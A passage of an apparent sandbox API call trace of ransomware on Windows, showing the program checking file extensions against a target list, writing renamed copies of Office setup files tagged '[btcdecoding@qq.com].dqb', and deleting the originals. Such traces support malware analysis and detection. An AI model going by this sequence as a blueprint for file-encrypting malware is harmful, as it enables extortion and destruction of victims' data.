hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0037.499] SetEndOfFile (hFile=0x1a4) returned 1 [0037.500] CloseHandle (hObject=0x1a4) returned 1 [0037.500] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0037.500] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\infopath.en-us\\infopathmui.xml")) returned 1 [0037.501] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML") returned 110 [0037.501] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML") returned 110 [0037.501] lstrlenW (lpString=".doc") returned 4 [0037.501] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0037.501] lstrlenW (lpString=".docx") returned 5 [0037.501] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1 [0037.501] lstrlenW (lpString=".pdf") returned 4 [0037.501] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0037.501] lstrlenW (lpString=".xls") returned 4 [0037.501] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0037.501] lstrlenW (lpString=".xlsx") returned 5 [0037.501] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1 [0037.501] lstrlenW (lpString=".ppt") returned 4 [0037.501] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0037.501] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML") returned 110 [0037.501] lstrlenW (lpString=".zip") returned 4 [0037.501] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0037.501] lstrlenW (lpString=".rar") returned 4 [0037.501] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0037.501] lstrlenW (lpString=".bz2") returned 4 [0037.501] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0037.501] lstrlenW (lpString=".7z") returned 3 [0037.501] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0037.501] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML") returned 110 [0037.501] lstrlenW (lpString=".dbf") returned 4 [0037.501] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0037.501] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML") returned 110 [0037.501] lstrlenW (lpString=".1cd") returned 4 [0037.501] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0037.501] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML") returned 110 [0037.501] lstrlenW (lpString=".jpg") returned 4 [0037.501] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0037.502] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML") returned 110 [0037.502] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML") returned 110 [0037.502] lstrlenW (lpString=".doc") returned 4 [0037.502] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0037.502] lstrlenW (lpString=".docx") returned 5 [0037.502] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1 [0037.502] lstrlenW (lpString=".pdf") returned 4 [0037.502] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0037.502] lstrlenW (lpString=".xls") returned 4 [0037.502] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0037.502] lstrlenW (lpString=".xlsx") returned 5 [0037.502] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1 [0037.502] lstrlenW (lpString=".ppt") returned 4 [0037.502] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0037.502] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML") returned 110 [0037.502] lstrlenW (lpString=".zip") returned 4 [0037.502] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0037.502] lstrlenW (lpString=".rar") returned 4 [0037.502] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0037.502] lstrlenW (lpString=".bz2") returned 4 [0037.502] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0037.502] lstrlenW (lpString=".7z") returned 3 [0037.502] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0037.502] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML") returned 110 [0037.502] lstrlenW (lpString=".dbf") returned 4 [0037.502] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0037.502] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML") returned 110 [0037.502] lstrlenW (lpString=".1cd") returned 4 [0037.502] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0037.502] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML") returned 110 [0037.502] lstrlenW (lpString=".jpg") returned 4 [0037.502] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0037.503] lstrcmpiW (lpString1=".XML", lpString2=".dqb") returned 1 [0037.503] lstrlenW (lpString="SETUP.XML") returned 9 [0037.503] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\infopath.en-us\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0037.503] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x227ff1c | out: lpFileSize=0x227ff1c*=1852) returned 1 [0037.503] CloseHandle (hObject=0x1a4) returned 1 [0037.503] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\infopath.en-us\\setup.xml")) returned 0x20 [0037.503] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\infopath.en-us\\setup.xml.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0037.503] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\infopath.en-us\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0037.503] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0037.503] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0037.503] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\infopath.en-us\\setup.xml.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0037.504] GetLastError () returned 0x0 [0037.504] ReadFile (in: hFile=0x1a4, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x73c, lpOverlapped=0x0) returned 1 [0037.508] WriteFile (in: hFile=0x1bc, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0x740, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0x740, lpOverlapped=0x0) returned 1 [0037.509] ReadFile (in: hFile=0x1a4, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0037.509] WriteFile (in: hFile=0x1bc, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0037.509] SetEndOfFile (hFile=0x1bc) returned 1 [0037.509] CloseHandle (hObject=0x1bc) returned 1 [0037.510] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0037.510] SetEndOfFile (hFile=0x1a4) returned 1 [0037.511] CloseHandle (hObject=0x1a4) returned 1 [0037.511] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0037.511] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\infopath.en-us\\setup.xml")) returned 1 [0037.511] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML") returned 104 [0037.511] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML") returned 104 [0037.511] lstrlenW (lpString=".doc") returned 4 [0037.511] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0037.511] lstrlenW (lpString=".docx") returned 5 [0037.511] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0037.511] lstrlenW (lpString=".pdf") returned 4 [0037.511] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0037.511] lstrlenW (lpString=".xls") returned 4 [0037.512] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0037.512] lstrlenW (lpString=".xlsx") returned 5 [0037.512] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0037.512] lstrlenW (lpString=".ppt") returned 4 [0037.512] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0037.512] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML") returned 104 [0037.512] lstrlenW (lpString=".zip") returned 4 [0037.512] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0037.512] lstrlenW (lpString=".rar") returned 4 [0037.512] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0037.512] lstrlenW (lpString=".bz2") returned 4 [0037.512] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0037.512] lstrlenW (lpString=".7z") returned 3 [0037.512] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0037.512] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML") returned 104 [0037.512] lstrlenW (lpString=".dbf") returned 4 [0037.512] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0037.512] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML") returned 104 [0037.512] lstrlenW (lpString=".1cd") returned 4 [0037.512] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0037.512] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML") returned 104 [0037.512] lstrlenW (lpString=".jpg") returned 4 [0037.512] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0037.512] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML") returned 104 [0037.512] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML") returned 104 [0037.512] lstrlenW (lpString=".doc") returned 4 [0037.512] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0037.512] lstrlenW (lpString=".docx") returned 5 [0037.512] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0037.512] lstrlenW (lpString=".pdf") returned 4 [0037.512] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0037.512] lstrlenW (lpString=".xls") returned 4 [0037.512] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0037.512] lstrlenW (lpString=".xlsx") returned 5 [0037.513] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0037.513] lstrlenW (lpString=".ppt") returned 4 [0037.513] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0037.513] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML") returned 104 [0037.513] lstrlenW (lpString=".zip") returned 4 [0037.513] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0037.513] lstrlenW (lpString=".rar") returned 4 [0037.513] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0037.513] lstrlenW (lpString=".bz2") returned 4 [0037.513] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0037.513] lstrlenW (lpString=".7z") returned 3 [0037.513] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0037.513] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML") returned 104 [0037.513] lstrlenW (lpString=".dbf") returned 4 [0037.513] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0037.513] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML") returned 104 [0037.513] lstrlenW (lpString=".1cd") returned 4 [0037.513] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0037.513] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML") returned 104 [0037.513] lstrlenW (lpString=".jpg") returned 4 [0037.513] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0037.513] lstrcmpiW (lpString1=".XML", lpString2=".dqb") returned 1 [0037.513] lstrlenW (lpString="BRANDING.XML") returned 12 [0037.513] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\branding.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0037.515] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x227ff1c | out: lpFileSize=0x227ff1c*=596341) returned 1 [0037.515] CloseHandle (hObject=0x1a4) returned 1 [0037.515] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\branding.xml")) returned 0x20 [0037.516] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\branding.xml.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0037.516] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\branding.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0037.516] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0037.516] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0037.516] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\branding.xml.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0037.516] GetLastError () returned 0x0 [0037.516] ReadFile (in: hFile=0x1a4, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x91975, lpOverlapped=0x0) returned 1 [0037.528] WriteFile (in: hFile=0x1bc, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0x91980, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0x91980, lpOverlapped=0x0) returned 1 [0037.537] ReadFile (in: hFile=0x1a4, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0037.537] WriteFile (in: hFile=0x1bc, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xec, lpOverlapped=0x0) returned 1 [0037.537] SetEndOfFile (hFile=0x1bc) returned 1 [0037.537] CloseHandle (hObject=0x1bc) returned 1 [0037.948] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0037.948] SetEndOfFile (hFile=0x1a4) returned 1 [0037.952] CloseHandle (hObject=0x1a4) returned 1 [0037.953] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0037.953] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\branding.xml")) returned 1 [0037.953] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML") returned 105 [0037.953] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML") returned 105 [0037.953] lstrlenW (lpString=".doc") returned 4 [0037.953] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0037.953] lstrlenW (lpString=".docx") returned 5 [0037.953] lstrcmpiW (lpString1=".docx", lpString2="G.XML") returned -1 [0037.953] lstrlenW (lpString=".pdf") returned 4 [0037.953] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0037.953] lstrlenW (lpString=".xls") returned 4 [0037.953] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0037.953] lstrlenW (lpString=".xlsx") returned 5 [0037.953] lstrcmpiW (lpString1=".xlsx", lpString2="G.XML") returned -1 [0037.954] lstrlenW (lpString=".ppt") returned 4 [0037.954] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0037.954] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML") returned 105 [0037.954] lstrlenW (lpString=".zip") returned 4 [0037.954] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0037.954] lstrlenW (lpString=".rar") returned 4 [0037.954] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0037.954] lstrlenW (lpString=".bz2") returned 4 [0037.954] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0037.954] lstrlenW (lpString=".7z") returned 3 [0037.954] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0037.954] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML") returned 105 [0037.954] lstrlenW (lpString=".dbf") returned 4 [0037.954] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0037.954] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML") returned 105 [0037.954] lstrlenW (lpString=".1cd") returned 4 [0037.954] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0037.954] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML") returned 105 [0037.954] lstrlenW (lpString=".jpg") returned 4 [0037.954] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0037.954] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML") returned 105 [0037.954] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML") returned 105 [0037.954] lstrlenW (lpString=".doc") returned 4 [0037.954] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0037.954] lstrlenW (lpString=".docx") returned 5 [0037.954] lstrcmpiW (lpString1=".docx", lpString2="G.XML") returned -1 [0037.954] lstrlenW (lpString=".pdf") returned 4 [0037.954] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0037.954] lstrlenW (lpString=".xls") returned 4 [0037.954] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0037.954] lstrlenW (lpString=".xlsx") returned 5 [0037.954] lstrcmpiW (lpString1=".xlsx", lpString2="G.XML") returned -1 [0037.954] lstrlenW (lpString=".ppt") returned 4 [0037.954] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0037.954] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML") returned 105 [0037.954] lstrlenW (lpString=".zip") returned 4 [0037.955] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0037.955] lstrlenW (lpString=".rar") returned 4 [0037.955] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0037.955] lstrlenW (lpString=".bz2") returned 4 [0037.955] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0037.955] lstrlenW (lpString=".7z") returned 3 [0037.955] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0037.955] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML") returned 105 [0037.955] lstrlenW (lpString=".dbf") returned 4 [0037.955] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0037.955] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML") returned 105 [0037.955] lstrlenW (lpString=".1cd") returned 4 [0037.955] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0037.955] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML") returned 105 [0037.955] lstrlenW (lpString=".jpg") returned 4 [0037.955] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0037.955] lstrcmpiW (lpString1=".CHM", lpString2=".dqb") returned -1 [0037.955] lstrlenW (lpString="OCT.CHM") returned 7 [0037.955] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OCT.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\oct.chm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0038.415] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x227ff1c | out: lpFileSize=0x227ff1c*=71236) returned 1 [0038.415] CloseHandle (hObject=0x1a4) returned 1 [0038.415] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OCT.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\oct.chm")) returned 0x20 [0038.415] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OCT.CHM.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\oct.chm.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0038.415] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OCT.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\oct.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0038.415] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0038.415] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0038.415] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OCT.CHM.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\oct.chm.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, 